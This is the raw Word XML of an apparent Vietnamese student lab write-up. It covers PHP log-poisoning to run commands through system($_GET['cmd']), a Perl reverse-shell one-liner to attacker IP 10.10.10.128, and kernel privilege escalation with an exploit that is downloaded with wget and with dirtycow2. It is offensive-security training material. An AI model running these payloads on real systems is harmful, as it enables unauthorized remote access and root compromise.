                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1158240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAF3BD5" w14:textId="0A62767E" w:rsidR="00A83992" w:rsidRDefault="00A83992">
      <w:r>
        <w:t>Kết quả trong trên web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B47AB53" w14:textId="77009A9F" w:rsidR="00A83992" w:rsidRDefault="00A83992">
      <w:r w:rsidRPr="00A83992">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D38ACF0" wp14:editId="05B07B7F">
            <wp:extent cx="5731510" cy="2879090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20748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50306" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2879090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="097DD230" w14:textId="77777777" w:rsidR="0030384F" w:rsidRDefault="00A83992">
      <w:r>
        <w:t xml:space="preserve">Kết quả cho thấy lệnh phpinfo() được thực thi trong các đoạn log. Điều này cho </w:t>
      </w:r>
      <w:r w:rsidR="00982583">
        <w:t>thấy</w:t>
      </w:r>
      <w:r w:rsidR="00217E5A">
        <w:t xml:space="preserve"> rằng đoạn php đưa vào đã được thực thi trên trang </w:t>
      </w:r>
      <w:r w:rsidR="0030384F">
        <w:t>web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34370A6A" w14:textId="700607B8" w:rsidR="00A83992" w:rsidRDefault="0030384F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Thay phpinfo() bằng system($_GET[‘cmd’]</w:t>
      </w:r>
      <w:r w:rsidR="00A83992">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>) để thực thi shell trên web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BBFB46" w14:textId="16C15037" w:rsidR="007A386A" w:rsidRDefault="007A386A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A386A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="112F1E4F" wp14:editId="5F42D94D">
            <wp:extent cx="5731510" cy="1565275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="120298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8839" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1565275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E517667" w14:textId="4F214E56" w:rsidR="007A386A" w:rsidRDefault="007A386A">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quả trên trang web</w:t>
      </w:r>
      <w:r w:rsidR="005A7021">
        <w:t xml:space="preserve"> khi đưa thêm tham số cmd=id</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126430DB" w14:textId="698D6894" w:rsidR="007A386A" w:rsidRDefault="005A7021">
      <w:r w:rsidRPr="005A7021">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70F1F105" wp14:editId="1A318BC7">
            <wp:extent cx="5731510" cy="2832100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="52763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32109" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2832100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF69A2E" w14:textId="1B485F6D" w:rsidR="00390E72" w:rsidRDefault="00390E72">
      <w:r>
        <w:t xml:space="preserve">Phản hồi trả về của trang </w:t>
      </w:r>
      <w:r w:rsidR="007D3F69">
        <w:t>web có chứa</w:t>
      </w:r>
      <w:r w:rsidR="001D7F60">
        <w:t xml:space="preserve"> thông tin về id của người dùng, id nhóm tương ứng với lệnh id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBD67C4" w14:textId="3B291B9F" w:rsidR="00EE03D5" w:rsidRDefault="00334815">
      <w:r>
        <w:t xml:space="preserve">Thực hiện lệnh trên cmd để có thể tạo ra 1 reverse shell. Tôi đã vào trang </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:anchor="bash-udp" w:history="1">
        <w:r w:rsidRPr="005E7407">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#bash-udp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> để thử từng lệnh gọi reverse shell và lệnh </w:t>
      </w:r>
      <w:r w:rsidR="00D30C0E" w:rsidRPr="00D30C0E">
        <w:rPr>
          <w:color w:val="ED0000"/>
        </w:rPr>
        <w:t>perl -e 'use Socket;$i="10.10.10.128";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</w:t>
      </w:r>
      <w:r w:rsidR="006953AE">
        <w:rPr>
          <w:color w:val="ED0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30C0E" w:rsidRPr="00D30C0E">
        <w:rPr>
          <w:color w:val="ED0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30C0E">
        <w:t>đã thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3AF9AA" w14:textId="22C6AE82" w:rsidR="00D30C0E" w:rsidRDefault="00D30C0E">
      <w:r w:rsidRPr="00D30C0E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B2177CF" wp14:editId="656F04C9">
            <wp:extent cx="5731510" cy="3628390"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="55500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623" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3628390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D61688" w14:textId="05E3A6A0" w:rsidR="00603D86" w:rsidRDefault="00603D86">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00603D86">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="097BFCE1" wp14:editId="74A0F26A">
            <wp:extent cx="5601482" cy="1200318"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3224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737" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5601482" cy="1200318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A64DD4" w14:textId="7A66DA7B" w:rsidR="005A7021" w:rsidRDefault="00CA4C4D">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sử</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dụng lệnh uname -a để hiển thị thông tin chi tiết về hệ thống của máy lab đang chạy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05868D4A" w14:textId="095A7930" w:rsidR="004D111E" w:rsidRDefault="004D111E">
      <w:r w:rsidRPr="004D111E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EE7CDC6" wp14:editId="0463F38A">
            <wp:extent cx="5731510" cy="446405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="44627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75035" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="446405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E17676" w14:textId="33171B62" w:rsidR="004D111E" w:rsidRDefault="004D111E">
      <w:r>
        <w:t>Kết quả trả về cho thấy rằng</w:t>
      </w:r>
      <w:r w:rsidR="00D3085A">
        <w:t xml:space="preserve"> phiên bản nhân của hệ thống là 4.4.0-21, đây là một phiên bản cũ </w:t>
      </w:r>
      <w:r w:rsidR="001F61E7">
        <w:t>đã tồn tại rất nhiều lỗ hổng có thể đưa user thường lên được root.Thực hiện tìm kiếmvaf chọn  một mã khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B9B63B" w14:textId="249F7FCD" w:rsidR="008D4B0D" w:rsidRDefault="008D4B0D">
      <w:r w:rsidRPr="008D4B0D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15F6A08F" wp14:editId="15A22AFC">
            <wp:extent cx="5731510" cy="2954020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18040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1471" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2954020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D8125" w14:textId="066F30B5" w:rsidR="008D4B0D" w:rsidRDefault="008D4B0D">
      <w:r>
        <w:t xml:space="preserve">Thực hiện tải tệp khai thác về máy tấn </w:t>
      </w:r>
      <w:r w:rsidR="007A2CA3">
        <w:t xml:space="preserve">công. Vì tệp khai thác được viết bằng ngôn ngữ c nên sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="004269C7">
        <w:t>gcc để giúp biên dịch tệp này thành một tệp thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790AC3FD" w14:textId="51CC0B89" w:rsidR="00E73BEC" w:rsidRDefault="00E73BEC">
      <w:r w:rsidRPr="00E73BEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BE3748B" wp14:editId="7FFAAFF1">
            <wp:extent cx="3200847" cy="514422"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6703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0522" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200847" cy="514422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C818C" w14:textId="3F6D9CC0" w:rsidR="00871596" w:rsidRDefault="00871596">
      <w:r>
        <w:t>Khởi chạy một máy chủ HTTP đơn giản với port 443 để thực hiện tải tệp này về từ phái máy lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A45FAE" w14:textId="3C9EDF0F" w:rsidR="00871596" w:rsidRDefault="007F0B1E">
      <w:r w:rsidRPr="007F0B1E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35E00BBB" wp14:editId="56A39B0F">
            <wp:extent cx="5731510" cy="543560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="120244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42727" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="543560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D15DAD" w14:textId="13F84630" w:rsidR="007F0B1E" w:rsidRDefault="007F0B1E">
      <w:r>
        <w:t>Sang máy lab</w:t>
      </w:r>
      <w:r w:rsidR="003E30A6">
        <w:t xml:space="preserve"> truy cập vào thư mục tmp45010</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và sử dụng wget để tải file thực thi về:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0898C945" w14:textId="466440A6" w:rsidR="007F0B1E" w:rsidRDefault="003446A4">
      <w:r w:rsidRPr="003446A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F10EDB5" wp14:editId="3F9D52CA">
            <wp:extent cx="5731510" cy="1916430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="12797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68324" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1916430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="047A1E67" w14:textId="3FF4ED0D" w:rsidR="00366376" w:rsidRDefault="00366376">
      <w:r>
        <w:t>Cấp toàn quyền thực thi cho file khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B72743" w14:textId="22A19630" w:rsidR="00366376" w:rsidRDefault="00366376">
      <w:r w:rsidRPr="00366376">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C0B85E8" wp14:editId="511CE049">
            <wp:extent cx="3439005" cy="428685"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="27730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9304" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3439005" cy="428685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FF35D5" w14:textId="418D7984" w:rsidR="00366376" w:rsidRDefault="007A2BD9">
      <w:r>
        <w:t xml:space="preserve">Thực thi và truy </w:t>
      </w:r>
      <w:r w:rsidR="00B23782">
        <w:t xml:space="preserve">câp </w:t>
      </w:r>
      <w:r>
        <w:t>thành công vào root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DB0E7B" w14:textId="2D507065" w:rsidR="007A2BD9" w:rsidRDefault="00B23782">
      <w:r w:rsidRPr="00B23782">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01F4A305" wp14:editId="7BB95A4C">
            <wp:extent cx="5731510" cy="2729865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="94654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5233" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2729865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E2015E" w14:textId="4AAB24E1" w:rsidR="00A0050D" w:rsidRPr="00A0050D" w:rsidRDefault="00A0050D" w:rsidP="00A0050D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0050D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidR="00397D1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cách</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0050D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00397D1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">tìm kiếm file khai thác </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0050D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09835690" w14:textId="25524D59" w:rsidR="007A2BD9" w:rsidRDefault="00CD70A6">
      <w:r>
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="008F27F2">
        <w:t xml:space="preserve">một </w:t>
      </w:r>
      <w:r w:rsidR="00F317B7">
        <w:t xml:space="preserve">file script shell </w:t>
      </w:r>
      <w:r w:rsidR="0094457A">
        <w:t xml:space="preserve">để </w:t>
      </w:r>
      <w:r w:rsidR="0094457A" w:rsidRPr="0094457A">
        <w:t>kiểm tra các phiên bản kernel và hệ thống hiện tại</w:t>
      </w:r>
      <w:r w:rsidR="0094457A">
        <w:t xml:space="preserve"> của lab </w:t>
      </w:r>
      <w:r w:rsidR="00FA0A1E">
        <w:t xml:space="preserve">và liệt kê các lỗ hổng tương ứng với </w:t>
      </w:r>
      <w:r w:rsidR="00AA3866">
        <w:t>nó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396FFAF3" w14:textId="66DEBBF3" w:rsidR="00397D1E" w:rsidRDefault="00CD70A6">
      <w:r w:rsidRPr="00CD70A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09DD4EB2" wp14:editId="60127D59">
            <wp:extent cx="5731510" cy="4606290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="15710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12824" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4606290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DE54CE" w14:textId="2A1B60FD" w:rsidR="00AA3866" w:rsidRDefault="00AA3866">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tải</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> về máy lab</w:t>
      </w:r>
      <w:r w:rsidR="00363E9D">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:t>phân quyền:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0812F194" w14:textId="7C06034A" w:rsidR="00AA3866" w:rsidRDefault="00D06AA9">
      <w:r w:rsidRPr="00D06AA9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DB92CAA" wp14:editId="1903B006">
            <wp:extent cx="5731510" cy="1996440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="7623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5083" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1996440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D5EC4E" w14:textId="59420B9B" w:rsidR="00A26AE9" w:rsidRDefault="00A26AE9">
      <w:r>
        <w:t>Thực thi file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F335E0F" w14:textId="2C73DAEC" w:rsidR="00A26AE9" w:rsidRDefault="00A26AE9">
      <w:r w:rsidRPr="00A26AE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73A24874" wp14:editId="449A2173">
            <wp:extent cx="5731510" cy="2099310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="21149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1103" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2099310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="299C80BB" w14:textId="1B0ED6AB" w:rsidR="0052437F" w:rsidRPr="00A26AE9" w:rsidRDefault="0052437F">
      <w:r w:rsidRPr="0052437F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="234E1379" wp14:editId="4289244F">
            <wp:extent cx="5731510" cy="3796665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="86996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1100" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3796665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DBFC35" w14:textId="303598F5" w:rsidR="003446A4" w:rsidRDefault="0052437F">
      <w:r>
        <w:t xml:space="preserve">Sử dụng mã khai thác </w:t>
      </w:r>
      <w:r w:rsidR="00D63B79">
        <w:t>dirtycow2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFC4722" w14:textId="1AAFD888" w:rsidR="00A9284B" w:rsidRDefault="00A9284B">
      <w:r w:rsidRPr="00A9284B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79F6176F" wp14:editId="5B2EC335">
            <wp:extent cx="5731510" cy="1759585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19215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5542" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1759585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7094946C" w14:textId="27A5FACF" w:rsidR="008B0DA0" w:rsidRDefault="008B0DA0">
      <w:r>
        <w:t>Chạy mã khai thác và thành công đổi password của root thành dirtyCowFun</w:t>
      </w:r>
    </w:p>
